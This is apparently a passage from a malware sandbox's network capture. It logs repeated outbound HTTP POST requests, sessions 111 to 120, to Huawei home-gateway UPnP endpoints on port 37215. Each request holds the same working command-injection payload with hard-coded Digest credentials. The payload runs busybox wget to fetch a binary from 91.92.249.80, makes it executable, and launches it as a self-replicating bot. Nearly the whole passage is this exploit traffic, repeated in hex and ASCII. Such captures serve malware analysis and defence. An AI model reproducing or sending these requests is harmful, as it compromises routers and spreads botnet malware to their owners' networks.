                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          111192.168.2.2349938157.209.250.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125858068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          112192.168.2.2348742157.207.113.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125863075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          113192.168.2.2359160197.246.134.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126478910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          114192.168.2.2337998157.106.179.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126486063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          115192.168.2.234899841.208.124.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126518011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          116192.168.2.2345822197.94.125.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126657963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          117192.168.2.2344768157.180.179.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126657963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          118192.168.2.234868641.218.51.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126673937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          119192.168.2.2344414185.74.163.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126692057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          120192.168.2.233923041.170.131.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126740932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
